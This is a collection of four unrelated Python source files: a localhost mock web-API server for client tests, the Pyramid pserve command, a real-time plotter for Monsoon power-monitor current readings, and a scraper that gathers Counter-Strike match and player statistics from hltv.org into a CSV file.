self.set_common_headers()
self.wfile.write("""{"ok":false}""".encode("utf-8"))
return
if pattern == "rate_limited":
self.send_response(429)
self.send_header("Retry-After", 1)
self.set_common_headers()
self.wfile.write(
"""{"ok":false,"error":"rate_limited"}""".encode("utf-8")
)
self.wfile.close()
return
if pattern == "timeout":
time.sleep(2)
self.send_response(200)
self.wfile.write("""{"ok":true}""".encode("utf-8"))
self.wfile.close()
return
if pattern == "html_response":
self.send_response(404)
self.send_header("content-type", "text/html;charset=utf-8")
self.send_header("connection", "close")
self.end_headers()
self.wfile.write(self.html_response_body.encode("utf-8"))
self.wfile.close()
return
if pattern == "error_html_response":
self.send_response(503)
# no charset here is intentional for testing
self.send_header("content-type", "text/html")
self.send_header("connection", "close")
self.end_headers()
self.wfile.write(self.error_html_response_body.encode("utf-8"))
self.wfile.close()
return
if pattern.startswith("user-agent"):
elements = pattern.split(" ")
prefix, suffix = elements[1], elements[-1]
ua: str = self.headers["User-Agent"]
if ua.startswith(prefix) and ua.endswith(suffix):
self.send_response(200)
self.set_common_headers()
self.wfile.write("""{"ok":true}""".encode("utf-8"))
self.wfile.close()
return
else:
self.send_response(400)
self.set_common_headers()
self.wfile.write(
"""{"ok":false, "error":"invalid_user_agent"}""".encode(
"utf-8"
)
)
self.wfile.close()
return
if request_body and "cursor" in request_body:
page = request_body["cursor"]
pattern = f"{pattern}_{page}"
if pattern == "coverage":
if self.path.startswith("/calls."):
for k, v in request_body.items():
if k == "users":
users = json.loads(v)
for u in users:
if "slack_id" not in u and "external_id" not in u:
raise Exception(f"User ({u}) is invalid value")
else:
ids = ["channels", "users", "channel_ids"]
if request_body:
for k, v in request_body.items():
if k in ids:
if not re.compile(r"^[^,\[\]]+?,[^,\[\]]+$").match(
v
):
raise Exception(
f"The parameter {k} is not a comma-separated string value: {v}"
)
body = {"ok": True, "method": parsed_path.path.replace("/", "")}
else:
with open(f"tests/data/web_response_{pattern}.json") as file:
body = json.load(file)
if self.path == "/api.test" and request_body:
body["args"] = request_body
else:
body = self.invalid_auth
if not body:
body = self.not_found
self.send_response(HTTPStatus.OK)
self.set_common_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
self.wfile.close()
except Exception as e:
self.logger.error(str(e), exc_info=True)
raise
def do_GET(self):
self._handle()
def do_POST(self):
self._handle()
class MockServerProcessTarget:
def __init__(self, handler: Type[SimpleHTTPRequestHandler] = MockHandler):
self.handler = handler
def run(self):
self.handler.received_requests = {}
self.server = HTTPServer(("localhost", 8888), self.handler)
try:
self.server.serve_forever(0.05)
finally:
self.server.server_close()
def stop(self):
self.handler.received_requests = {}
self.server.shutdown()
self.join()
class MonitorThread(threading.Thread):
def __init__(
self, test: TestCase, handler: Type[SimpleHTTPRequestHandler] = MockHandler
):
threading.Thread.__init__(self, daemon=True)
self.handler = handler
self.test = test
self.test.mock_received_requests = None
self.is_running = True
def run(self) -> None:
while self.is_running:
try:
req = Request(f"{self.test.server_url}/received_requests.json")
resp = urlopen(req, timeout=1)
self.test.mock_received_requests = json.loads(
resp.read().decode("utf-8")
)
except Exception as e:
# skip logging for the initial request
if self.test.mock_received_requests is not None:
logging.getLogger(__name__).exception(e)
time.sleep(0.01)
def stop(self):
self.is_running = False
self.join()
class MockServerThread(threading.Thread):
def __init__(
self, test: TestCase, handler: Type[SimpleHTTPRequestHandler] = MockHandler
):
threading.Thread.__init__(self)
self.handler = handler
self.test = test
def run(self):
self.server = HTTPServer(("localhost", 8888), self.handler)
self.test.server_url = "http://localhost:8888"
self.test.host, self.test.port = self.server.socket.getsockname()
self.test.server_started.set() # threading.Event()
self.test = None
try:
self.server.serve_forever()
finally:
self.server.server_close()
def stop(self):
self.server.shutdown()
self.join()
def setup_mock_web_api_server(test: TestCase):
if get_mock_server_mode() == "threading":
test.server_started = threading.Event()
test.thread = MockServerThread(test)
test.thread.start()
test.server_started.wait()
else:
# start a mock server as another process
target = MockServerProcessTarget()
test.server_url = "http://localhost:8888"
test.host, test.port = "localhost", 8888
test.process = Process(target=target.run, daemon=True)
test.process.start()
time.sleep(0.1)
# start a thread in the current process
# this thread fetches mock_received_requests from the remote process
test.monitor_thread = MonitorThread(test)
test.monitor_thread.start()
count = 0
# wait until the first successful data retrieval
while test.mock_received_requests is None:
time.sleep(0.01)
count += 1
if count >= 100:
raise Exception("The mock server is not yet running!")
def cleanup_mock_web_api_server(test: TestCase):
if get_mock_server_mode() == "threading":
test.thread.stop()
test.thread = None
else:
# stop the thread to fetch mock_received_requests from the remote process
test.monitor_thread.stop()
retry_count = 0
# terminate the process
while test.process.is_alive():
test.process.terminate()
time.sleep(0.01)
retry_count += 1
if retry_count >= 100:
raise Exception("Failed to stop the mock server!")
# Python 3.6 does not have this method
if sys.version_info.major == 3 and sys.version_info.minor > 6:
# cleanup the process's resources
test.process.close()
test.process = None
def assert_auth_test_count(test: TestCase, expected_count: int):
time.sleep(0.1)
retry_count = 0
error = None
while retry_count < 3:
try:
            assert test.mock_received_requests["/auth.test"] == expected_count
break
except Exception as e:
error = e
retry_count += 1
# waiting for mock_received_requests updates
time.sleep(0.1)
if error is not None:
raise error
async def assert_auth_test_count_async(test: TestCase, expected_count: int):
await asyncio.sleep(0.1)
retry_count = 0
error = None
while retry_count < 3:
try:
            assert test.mock_received_requests["/auth.test"] == expected_count
break
except Exception as e:
error = e
retry_count += 1
# waiting for mock_received_requests updates
await asyncio.sleep(0.1)
if error is not None:
raise error
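
# --- Illustrative usage sketch (added by the editor, not part of the original helpers) ---
# A minimal TestCase wiring for the helpers above. The token suffix "200" makes
# MockHandler answer with that numeric status code, and the User-Agent has to match both
# patterns checked in is_valid_user_agent(). The class and test names are made up.
import unittest


class ExampleMockServerTest(unittest.TestCase):
    def setUp(self):
        setup_mock_web_api_server(self)

    def tearDown(self):
        cleanup_mock_web_api_server(self)

    def test_numeric_token_maps_to_status_code(self):
        req = Request(
            f"{self.server_url}/api.test",
            headers={
                "Authorization": "Bearer xoxb-200",
                "User-Agent": "Python/3.9 slackclient/3.0.0 python/3.9.0",
            },
        )
        resp = urlopen(req)
        self.assertEqual(resp.status, 200)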
|
pserve.py
|
# (c) 2005 Ian Bicking and contributors; written for Paste
# (http://pythonpaste.org) Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
#
# Code taken also from QP: http://www.mems-exchange.org/software/qp/ From
# lib/site.py
import argparse
import os
import re
import sys
import textwrap
import threading
import time
import webbrowser
import hupper
from pyramid.compat import PY2
from pyramid.scripts.common import get_config_loader
from pyramid.scripts.common import parse_vars
from pyramid.path import AssetResolver
from pyramid.settings import aslist
def main(argv=sys.argv, quiet=False):
command = PServeCommand(argv, quiet=quiet)
return command.run()
class PServeCommand(object):
description = """\
This command serves a web application that uses a PasteDeploy
configuration file for the server and application.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
default_verbosity = 1
parser = argparse.ArgumentParser(
description=textwrap.dedent(description),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
'-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_argument(
'-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_argument(
'--server-name',
dest='server_name',
metavar='SECTION_NAME',
help=("Use the named server as defined in the configuration file "
"(default: main)"))
parser.add_argument(
'--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_argument(
'--reload-interval',
dest='reload_interval',
default=1,
help=("Seconds between checking files (low number can cause "
"significant CPU usage)"))
parser.add_argument(
'-b', '--browser',
dest='browser',
action='store_true',
help=("Open a web browser to the server url. The server url is "
"determined from the 'open_url' setting in the 'pserve' "
"section of the configuration file."))
parser.add_argument(
'-v', '--verbose',
default=default_verbosity,
dest='verbose',
action='count',
help="Set verbose level (default " + str(default_verbosity) + ")")
parser.add_argument(
'-q', '--quiet',
action='store_const',
const=0,
dest='verbose',
help="Suppress verbose output")
parser.add_argument(
'config_uri',
nargs='?',
default=None,
help='The URI to the configuration file.',
)
parser.add_argument(
'config_vars',
nargs='*',
default=(),
help="Variables required by the config file. For example, "
"`http_port=%%(http_port)s` would expect `http_port=8080` to be "
"passed here.",
)
_get_config_loader = staticmethod(get_config_loader) # for testing
open_url = None
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
def __init__(self, argv, quiet=False):
self.args = self.parser.parse_args(argv[1:])
if quiet:
self.args.verbose = 0
if self.args.reload:
self.worker_kwargs = {'argv': argv, "quiet": quiet}
self.watch_files = set()
def out(self, msg): # pragma: no cover
if self.args.verbose > 0:
print(msg)
def get_config_path(self, loader):
return os.path.abspath(loader.uri.path)
def pserve_file_config(self, loader, global_conf=None):
settings = loader.get_settings('pserve', global_conf)
config_path = self.get_config_path(loader)
here = os.path.dirname(config_path)
watch_files = aslist(settings.get('watch_files', ''), flatten=False)
# track file paths relative to the ini file
resolver = AssetResolver(package=None)
for file in watch_files:
if ':' in file:
file = resolver.resolve(file).abspath()
elif not os.path.isabs(file):
file = os.path.join(here, file)
self.watch_files.add(os.path.abspath(file))
# attempt to determine the url of the server
open_url = settings.get('open_url')
if open_url:
self.open_url = open_url
def guess_server_url(self, loader, server_name, global_conf=None):
server_name = server_name or 'main'
settings = loader.get_settings('server:' + server_name, global_conf)
if 'port' in settings:
return 'http://127.0.0.1:{port}'.format(**settings)
def run(self): # pragma: no cover
if not self.args.config_uri:
self.out('You must give a config file')
return 2
config_uri = self.args.config_uri
config_vars = parse_vars(self.args.config_vars)
app_spec = self.args.config_uri
app_name = self.args.app_name
loader = self._get_config_loader(config_uri)
loader.setup_logging(config_vars)
self.pserve_file_config(loader, global_conf=config_vars)
server_name = self.args.server_name
if self.args.server:
server_spec = 'egg:pyramid'
assert server_name is None
server_name = self.args.server
else:
server_spec = app_spec
server_loader = loader
if server_spec != app_spec:
            server_loader = self._get_config_loader(server_spec)
# do not open the browser on each reload so check hupper first
if self.args.browser and not hupper.is_active():
url = self.open_url
if not url:
url = self.guess_server_url(
server_loader, server_name, config_vars)
if not url:
self.out('WARNING: could not determine the server\'s url to '
'open the browser. To fix this set the "open_url" '
'setting in the [pserve] section of the '
'configuration file.')
else:
def open_browser():
time.sleep(1)
webbrowser.open(url)
t = threading.Thread(target=open_browser)
t.setDaemon(True)
t.start()
if self.args.reload and not hupper.is_active():
if self.args.verbose > 1:
self.out('Running reloading file monitor')
hupper.start_reloader(
'pyramid.scripts.pserve.main',
reload_interval=int(self.args.reload_interval),
verbose=self.args.verbose,
worker_kwargs=self.worker_kwargs
)
return 0
config_path = self.get_config_path(loader)
self.watch_files.add(config_path)
server_path = self.get_config_path(server_loader)
self.watch_files.add(server_path)
if hupper.is_active():
reloader = hupper.get_reloader()
reloader.watch_files(list(self.watch_files))
server = server_loader.get_wsgi_server(server_name, config_vars)
app = loader.get_wsgi_app(app_name, config_vars)
if self.args.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
self.out(msg)
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.args.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
self.out('Exiting%s (-v to see traceback)' % msg)
# For paste.deploy server instantiation (egg:pyramid#wsgiref)
def wsgiref_server_runner(wsgi_app, global_conf, **kw): # pragma: no cover
from wsgiref.simple_server import make_server
host = kw.get('host', '0.0.0.0')
port = int(kw.get('port', 8080))
server = make_server(host, port, wsgi_app)
print('Starting HTTP server on http://%s:%s' % (host, port))
server.serve_forever()
# For paste.deploy server instantiation (egg:pyramid#cherrypy)
def cherrypy_server_runner(
app, global_conf=None, host='127.0.0.1', port=None,
ssl_pem=None, protocol_version=None, numthreads=None,
server_name=None, max=None, request_queue_size=None,
timeout=None
): # pragma: no cover
"""
Entry point for CherryPy's WSGI server
Serves the specified WSGI app via CherryPyWSGIServer.
``app``
The WSGI 'application callable'; multiple WSGI applications
may be passed as (script_name, callable) pairs.
``host``
This is the ipaddress to bind to (or a hostname if your
nameserver is properly configured). This defaults to
127.0.0.1, which is not a public interface.
``port``
The port to run on, defaults to 8080 for HTTP, or 4443 for
HTTPS. This can be a string or an integer value.
``ssl_pem``
        This is an optional SSL certificate file (via OpenSSL). You can
generate a self-signed test PEM certificate file as follows:
$ openssl genrsa 1024 > host.key
$ chmod 400 host.key
$ openssl req -new -x509 -nodes -sha1 -days 365 \\
-key host.key > host.cert
$ cat host.cert host.key > host.pem
$ chmod 400 host.pem
``protocol_version``
The protocol used by the server, by default ``HTTP/1.1``.
``numthreads``
The number of worker threads to create.
``server_name``
The string to set for WSGI's SERVER_NAME environ entry.
``max``
The maximum number of queued requests. (defaults to -1 = no
limit).
``request_queue_size``
The 'backlog' argument to socket.listen(); specifies the
maximum number of queued connections.
``timeout``
The timeout in seconds for accepted connections.
"""
is_ssl = False
if ssl_pem:
port = port or 4443
is_ssl = True
if not port:
if ':' in host:
host, port = host.split(':', 1)
else:
port = 8080
bind_addr = (host, int(port))
kwargs = {}
for var_name in ('numthreads', 'max', 'request_queue_size', 'timeout'):
var = locals()[var_name]
if var is not None:
kwargs[var_name] = int(var)
from cherrypy import wsgiserver
server = wsgiserver.CherryPyWSGIServer(bind_addr, app,
server_name=server_name, **kwargs)
if ssl_pem is not None:
if PY2:
server.ssl_certificate = server.ssl_private_key = ssl_pem
else:
# creates wsgiserver.ssl_builtin as side-effect
wsgiserver.get_ssl_adapter_class()
server.ssl_adapter = wsgiserver.ssl_builtin.BuiltinSSLAdapter(
ssl_pem, ssl_pem)
if protocol_version:
server.protocol = protocol_version
try:
protocol = is_ssl and 'https' or 'http'
if host == '0.0.0.0':
print('serving on 0.0.0.0:%s view at %s://127.0.0.1:%s' %
(port, protocol, port))
else:
print('serving on %s://%s:%s' % (protocol, host, port))
server.start()
except (KeyboardInterrupt, SystemExit):
server.stop()
return server
if __name__ == '__main__': # pragma: no cover
sys.exit(main() or 0)
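
# --- Illustrative configuration sketch (added by the editor, not part of pserve) ---
# An example of the ini sections this command reads; the project and file names are
# made up. [app:main] and [server:main] are resolved through PasteDeploy, the optional
# [pserve] section feeds pserve_file_config() (open_url, watch_files), and the "port"
# key in [server:main] is what guess_server_url() falls back to when open_url is unset.
#
#   [app:main]
#   use = egg:MyProject
#
#   [server:main]
#   use = egg:waitress#main
#   host = 127.0.0.1
#   port = 6543
#
#   [pserve]
#   open_url = http://127.0.0.1:6543/
#   watch_files = myproject/config.yml
#
# Typical invocation:  pserve development.ini --reload -b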
|
plot_realtime_power.py
|
#!/usr/bin/env python
import Monsoon.LVPM as LVPM
import Monsoon.HVPM as HVPM
from Monsoon import sampleEngine
import argparse
import csv
import os
import matplotlib
matplotlib.use('TKAgg')
from matplotlib import pyplot as plt
import matplotlib.animation as animation
import threading
import collections
import signal
import sys
fig, ax = plt.subplots()
plt.ylabel('amperage (mA)')
plt.xlabel('time sequences')
plt.ylim((0, 2000))
display_range = 50000
samples_queue = collections.deque(maxlen=display_range)
time_queue = collections.deque(maxlen=display_range)
time_queue.extend([0 for _ in range(display_range)])
samples_queue.extend([0 for _ in range(display_range)])
line, = ax.plot(time_queue, samples_queue, linewidth=0.5)
should_pause = False
csv_file_handle = None
csv_writer = None
trigger_count = 0
trigger = float("inf")
triggered = False
header = ["Time(ms)", "Main(mA)", "Main Voltage(V)"]
def animate(_):
if should_pause:
return line,
# print("samples: {}".format(latest_current_values))
line.set_xdata(time_queue)
line.set_ydata(samples_queue) # update the data
ax.relim()
for label in ax.xaxis.get_ticklabels()[::100]:
label.set_visible(False)
ax.autoscale_view(True, True, True)
return line,
def sample_generator(sampler, sample_number_):
sampler.startSampling(sample_number_, output_callback=samples_callback)
def samples_callback(samples_):
last_values = samples_[sampleEngine.channels.MainCurrent]
if last_values:
# filter negative values
valid_values = [max(v, 0) for v in last_values]
time_queue.extend(samples_[sampleEngine.channels.timeStamp])
samples_queue.extend(valid_values)
avg = sum(valid_values) / len(valid_values)
if avg > trigger:
global triggered
triggered = True
if triggered:
records = list(zip(samples_[sampleEngine.channels.timeStamp],
samples_[sampleEngine.channels.MainCurrent],
samples_[2]))
global csv_file_handle, csv_writer
if not csv_writer:
csv_writer = csv.writer(csv_file_handle)
csv_writer.writerow(header)
csv_writer.writerows(records)
def on_click(_event):
global should_pause
if _event.dblclick:
should_pause ^= True
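
# --- Illustrative sketch (added by the editor, not part of the original script) ---
# The triggering rule used in samples_callback() above, isolated as a pure function:
# negative readings are clamped to zero and logging starts once the mean current of a
# callback batch exceeds the threshold. The function name and numbers are made up.
def batch_exceeds_trigger(currents_ma, threshold_ma):
    valid = [max(v, 0) for v in currents_ma]  # clamp sensor glitches below 0 mA
    return bool(valid) and sum(valid) / len(valid) > threshold_ma

# e.g. batch_exceeds_trigger([12.0, -3.0, 450.0], 100.0) -> True (mean 154 mA > 100 mA)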
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--number_of_samples", type=int, default=-1,
help="number of power samples per second, default to -1 meaning sample infinitely")
parser.add_argument("-m", "--monsoon_model", choices=("lvpm", "hvpm", "l", "h", "black", "white", "b", "w"),
default="w",
help="Monsoon type, either white(w,l,lvpm) or black(b,h,hvpm)")
parser.add_argument("-s", "--save_file", type=str, default=None, # 'data/power_samples.csv',
help="file to save power samples")
parser.add_argument("-t", "--trigger", type=float, default=float("inf"),
help="threshold to trigger sampling, unit is mA")
args = parser.parse_args()
sample_number = args.number_of_samples if args.number_of_samples > 0 else sampleEngine.triggers.SAMPLECOUNT_INFINITE
monsoon_model = args.monsoon_model
if monsoon_model.startswith('l') or monsoon_model.startswith('w'):
monsoon = LVPM.Monsoon() # white
else:
monsoon = HVPM.Monsoon()
monsoon.setup_usb()
print("Monsoon Power Monitor Serial number: {}".format(monsoon.getSerialNumber()))
engine = sampleEngine.SampleEngine(monsoon)
trigger = args.trigger
if args.save_file:
dir_name = os.path.dirname(args.save_file)
        if dir_name and not os.path.exists(dir_name):
os.makedirs(dir_name)
if trigger < float("inf"): # set trigger
engine.disableCSVOutput()
# global csv_name
csv_file = args.save_file
csv_file_handle = open(csv_file, 'w')
else:
engine.enableCSVOutput(args.save_file)
else:
engine.disableCSVOutput()
engine.ConsoleOutput(True)
    def signal_handler(_signal, _frame):
        print('You pressed Ctrl+C, stopping Monsoon sampling and exiting!')
        monsoon.stopSampling()
        if csv_file_handle:
            csv_file_handle.close()
        sys.exit(0)
    def handle_close(_event):
        print('You closed the figure, stopping Monsoon sampling and exiting!')
        monsoon.stopSampling()
        if csv_file_handle:
            csv_file_handle.close()
        sys.exit(0)
fig.canvas.mpl_connect('close_event', handle_close)
fig.canvas.mpl_connect('button_press_event', on_click)
signal.signal(signal.SIGINT, signal_handler)
pt = threading.Thread(target=sample_generator, name='sample_generator', args=(engine, sample_number))
pt.daemon = True
pt.start()
ani = animation.FuncAnimation(fig, animate, interval=100)
plt.show()
|
parcer_new_train.py
|
from bs4 import BeautifulSoup
import requests
import re
import numpy as np
import json
import csv
from threading import Thread
counter_last_matches = 10
def parse(url):
matches_links = []
page = requests.get(url)
# Success - 200
if page.status_code != 200:
exit(-1)
soup = BeautifulSoup(page.text, "html.parser")
# print(soup)
new = []
for i in soup.findAll('a', class_='a-reset'):
new.append(i.get('href'))
for i in new:
if re.search(r'\bmatches\b', i):
matches_links.append(i)
del new
return matches_links
def parse_links():
    # First page
matches_links = parse('https://www.hltv.org/results')
with open('data/matches_links_0.json', 'w') as file:
json.dump(matches_links, file)
    # Remaining pages
for i in range(1, 5): # max - 4930
# print(i)
matches_links = parse(f'https://www.hltv.org/results?offset={i * 100}')
with open(f'data/matches_links_{i}.json', 'w') as file:
json.dump(matches_links, file)
# Optimized
# Get players from team
# BAD!!!
def get_players(url):
page = requests.get(url)
tmp1 = BeautifulSoup(page.text, "html.parser").findAll('div', class_='team1-gradient')[0].findAll('a')[0].get(
'href')
tmp2 = BeautifulSoup(page.text, "html.parser").findAll('div', class_='team2-gradient')[0].findAll('a')[0].get(
'href')
s1 = f'https://www.hltv.org{tmp1}'
s2 = f'https://www.hltv.org{tmp2}'
kd = []
kpr = []
hd = []
mp = []
dpr = []
rc = []
names = []
players = []
page = requests.get(s1)
page = BeautifulSoup(page.text, "html.parser")
for i in page.findAll('div', class_='bodyshot-team g-grid')[0].findAll('a'):
players.append(i.get('href'))
for i in players:
names.append(i.split('/')[3])
page = requests.get(f'https://www.hltv.org{i}')
page = BeautifulSoup(page.text, "html.parser")
kd.append(page.findAll('span', class_='statsVal')[0].text)
kpr.append(page.findAll('span', class_='statsVal')[1].text)
hd.append(page.findAll('span', class_='statsVal')[2].text.split('%')[0])
mp.append(page.findAll('span', class_='statsVal')[3].text)
dpr.append(page.findAll('span', class_='statsVal')[4].text)
rc.append(page.findAll('span', class_='statsVal')[5].text.split('%')[0])
players = []
page = requests.get(s2)
page = BeautifulSoup(page.text, "html.parser")
for i in page.findAll('div', class_='bodyshot-team g-grid')[0].findAll('a'):
players.append(i.get('href'))
for i in players:
names.append(i.split('/')[3])
page = requests.get(f'https://www.hltv.org{i}')
page = BeautifulSoup(page.text, "html.parser")
kd.append(page.findAll('span', class_='statsVal')[0].text)
kpr.append(page.findAll('span', class_='statsVal')[1].text)
hd.append(page.findAll('span', class_='statsVal')[2].text.split('%')[0])
mp.append(page.findAll('span', class_='statsVal')[3].text)
dpr.append(page.findAll('span', class_='statsVal')[4].text)
rc.append(page.findAll('span', class_='statsVal')[5].text.split('%')[0])
return kd, kpr, hd, mp, dpr, rc, names
def check_size(arr, i):
if len(arr) != i:
print('ERROR!!!')
exit(-1)
# Optimized
# Get players from match
def get_players_1(url, tick):
players = []
page = requests.get(url)
page = BeautifulSoup(page.text, "html.parser")
page = page.findAll('td', class_='player')
for i in page:
for k in i.findAll('a'):
players.append(k.get('href'))
if tick == 0:
players = players[:5]
elif tick == -1:
players = players[5:15]
else:
players = players[-5:]
# print(players)
names = []
kd = []
kpr = []
hd = []
mp = []
dpr = []
rc = []
for i in players:
names.append(i.split('/')[3])
page = requests.get(f'https://www.hltv.org{i}')
page = BeautifulSoup(page.text, "html.parser")
kd.append(page.findAll('span', class_='statsVal')[0].text)
kpr.append(page.findAll('span', class_='statsVal')[1].text)
hd.append(page.findAll('span', class_='statsVal')[2].text.split('%')[0])
mp.append(page.findAll('span', class_='statsVal')[3].text)
dpr.append(page.findAll('span', class_='statsVal')[4].text)
rc.append(page.findAll('span', class_='statsVal')[5].text.split('%')[0])
new = kd + kpr + hd + mp + dpr + rc
for i in range(len(new)):
new[i] = float(new[i])
if tick == -1:
check_size(new, 60)
else:
check_size(new, 30)
return new
def get_data(url):
# Optimized
def get_date(url):
page = requests.get(url)
return int(int(BeautifulSoup(page.text, "html.parser").findAll('div', class_='date')[0] \
.get('data-unix')) / 1000)
# Optimized
def get_team_name(url):
page = requests.get(url)
page = BeautifulSoup(page.text, "html.parser")
tmp1 = page.findAll('div', class_='teamName')[0].text
tmp2 = page.findAll('div', class_='teamName')[1].text
check_size([tmp1, tmp2], 2)
return [tmp1, tmp2]
# Optimized
def get_g_score(url):
page = requests.get(url)
tmp = BeautifulSoup(page.text, "html.parser")
tmp1 = tmp.findAll('div', class_='team1-gradient')[0] \
.findAll('div')[1].text
tmp2 = tmp.findAll('div', class_='team2-gradient')[0] \
.findAll('div')[1].text
return float(int(tmp1) / (int(tmp1) + int(tmp2)))
# Optimized
def get_history_score(url, current_date):
page = requests.get(url)
page = BeautifulSoup(page.text, "html.parser")
tmp1 = int(page \
.find_all('div', class_='flexbox-column flexbox-center grow right-border')[0] \
.find_all('div', class_='bold')[0] \
.text)
# print(tmp1)
tmp2 = int(page \
.find_all('div', class_='flexbox-column flexbox-center grow left-border')[0] \
.find_all('div', class_='bold')[0] \
.text)
# print(tmp2)
tmp3 = page \
.find_all('tr', attrs=re.compile(".*row nowrap.*"))
counter = 0
score = 0
for i in range(len(tmp3)):
tmp3_date = int(int(tmp3[i].find_all('span')[0].get('data-unix')) / 1000)
if 0 < current_date - tmp3_date < 15552000: # Last 6 months
counter += 1
# print(current_date - tmp3_date)
tmp3_ = tmp3[i].find_all('td', 'result')[0].text
tmp3_ = tmp3_.split()
score += int(tmp3_[0]) - int(tmp3_[2])
# print(tmp3_)
# print(tmp3_date)
if counter != 0:
score = ((score / counter) + 16) / 32
else:
score = 0.5
check_size([tmp1, tmp2, score], 3)
return [tmp1, tmp2, score]
# Optimized
def get_prize_pull(url):
page = requests.get(url)
url1 = BeautifulSoup(page.text, "html.parser") \
.findAll('div', class_='event text-ellipsis')[0] \
.find_all('a')[0] \
.get('href')
page = requests.get(f'https://www.hltv.org{url1}')
txt = BeautifulSoup(page.text, "html.parser") \
.findAll('td', class_='prizepool text-ellipsis')[0].get('title')
try:
txt = txt.split()
txt = txt[0].split('$')[1]
txt = txt.split(',')
res = ''
for i in range(len(txt)):
res += txt[i]
res = int(res)
return res
except:
return 0
# Optimized
def all_stat_team(url, curr_date):
# Optimized
def get_win_streak_and_rate(s):
tmp = s.find_all('div', 'highlighted-stat')
try:
tmp1 = float(tmp[0].find_all('div', 'stat')[0].text)
except:
tmp1 = 0
try:
tmp2 = float(tmp[1].find_all('div', 'stat')[0].text.split('%')[0])
except:
tmp2 = 0
check_size([tmp1, tmp2], 2)
return [tmp1, tmp2]
# Optimized
def get_rank(s):
try:
rank_1 = s[0].findAll('span')[0].text
return int(rank_1.split('#')[1])
except:
return 1000
# Optimized
def get_avarage_age(s):
try:
return float(s[2].findAll('span')[0].text)
except:
return 0
# Optimized
def get_weeks_in_top30_for_core(s):
try:
return float(s[1].findAll('span')[0].text)
except:
return 0
# Optimized
def world_ranking_avarage_age_weeks(s):
tmp = BeautifulSoup(requests.get(s).text, "html.parser")
arr = tmp.findAll('div', class_='profile-team-stat')
tmp = [get_rank(arr), get_weeks_in_top30_for_core(arr),
get_avarage_age(arr), *get_win_streak_and_rate(tmp)]
check_size(tmp, 5)
return tmp
def last_20_matches(s):
team_name = s.split('/')[-1]
print(f'parse {counter_last_matches} last matches for {team_name}')
page = requests.get(s)
page = BeautifulSoup(page.text, "html.parser").find_all('a', 'moreButton')[1].get('href')
page = requests.get(f'https://www.hltv.org{page}')
page = BeautifulSoup(page.text, "html.parser").find_all('div', 'result-con')
            # Collected the list of the team's most recent matches
i = 0
g_i = 0
res = []
score = []
prize = []
players = []
history = []
while g_i < counter_last_matches:
tmp = page[i]
tmp2 = tmp.find_all('a', 'a-reset')[0].get('href')
match_link = f'https://www.hltv.org{tmp2}'
                # Check that the match took place before the current one
date = get_date(match_link)
if 0 < curr_date - date:
try:
tmp1 = tmp.find_all('td', 'result-score')[0].text.split()
                        # Match score
score_tmp = (int(tmp1[0]) / (int(tmp1[0]) + int(tmp1[2])))
                        # Tournament prize pool
prize_tmp = get_prize_pull(f'https://www.hltv.org{tmp2}')
# Save match link
                        # Head-to-head history
history_tmp = get_history_score(match_link, date)
                        # Go to the match page
tmp2 = requests.get(f'https://www.hltv.org{tmp2}')
tmp2 = BeautifulSoup(tmp2.text, "html.parser")
tmp2 = tmp2.find_all('div', re.compile("team.*-gradient"))
                        # Collect info about the opposing team
                        # Check that it is not the same team
if str(tmp2[0].find_all('a')[0].get('href').split('/')[-1]) != str(team_name):
players_tmp = get_players_1(match_link, 0)
tmp2 = tmp2[0].find_all('a')[0].get('href')
res.append(world_ranking_avarage_age_weeks(f'https://www.hltv.org{tmp2}'))
else:
players_tmp = get_players_1(match_link, 1)
tmp2 = tmp2[1].find_all('a')[0].get('href')
res.append(world_ranking_avarage_age_weeks(f'https://www.hltv.org{tmp2}'))
score.append(score_tmp)
prize.append(prize_tmp)
players.append(players_tmp)
history.append(history_tmp)
# print(f'https://www.hltv.org{tmp2}')
print(f'parse match {g_i}')
g_i += 1
except:
pass
i += 1
return [*res, score, prize, *players, *history]
page = requests.get(url)
page = BeautifulSoup(page.text, "html.parser")
tmp1 = page.findAll('div', class_='team1-gradient')[0].findAll('a')[0].get('href')
tmp2 = page.findAll('div', class_='team2-gradient')[0].findAll('a')[0].get('href')
link1 = f'https://www.hltv.org{tmp1}'
link2 = f'https://www.hltv.org{tmp2}'
arr1 = [*world_ranking_avarage_age_weeks(link1), *world_ranking_avarage_age_weeks(link2)]
arr2 = [*last_20_matches(link1), *last_20_matches(link2)]
arr2_tmp = []
for i in arr2:
for k in i:
arr2_tmp.append(k)
arr2 = arr2_tmp
check_size(arr1, 10)
check_size(arr2, counter_last_matches * 80)
return arr1, arr2
try:
date = get_date(url)
# print(date) # Perfect
# print(*get_team_name(url)) # Perfect
# print(get_g_score(url)) # Perfect
# print(*get_history_score(url, date)) # Perfect
# print(get_prize_pull(url)) # Perfect
tmp = get_players_1(url, -1)
arr1, arr2 = all_stat_team(url, date)
new_list1 = [(url,
*get_team_name(url),
date,
get_g_score(url),
*get_history_score(url, date),
get_prize_pull(url),
*tmp,
*arr1,
*arr2,)
]
with open('data.csv', "a+", newline="") as file:
writer = csv.writer(file)
writer.writerows(new_list1)
# Final size = 79 + 80 * x
except:
pass
parse_links()
first_line = [("URL", "NAME1", "NAME2", 'DATE', 'G_SCORE (A/(A + B))',
'HISTORY_SCORE_A', 'HISTORY_SCORE_B',
               'HISTORY_SCORE_MAPS ((SUM(A - B)/N + 16) / 32)', 'PRIZE_POOL',
'KD x 10', 'KPR x 10', 'HEADSHOTS x 10', 'MAPS x 10',
'DPR x 10', 'RC x 10', 'DONT TRY TO UNDERSTAND!!!!'
)]
"""with open('data.csv', "a+", newline="") as file:
writer = csv.writer(file)
writer.writerows(first_line)"""
def main(arr, i):
for k in range(len(arr)):
error = 0
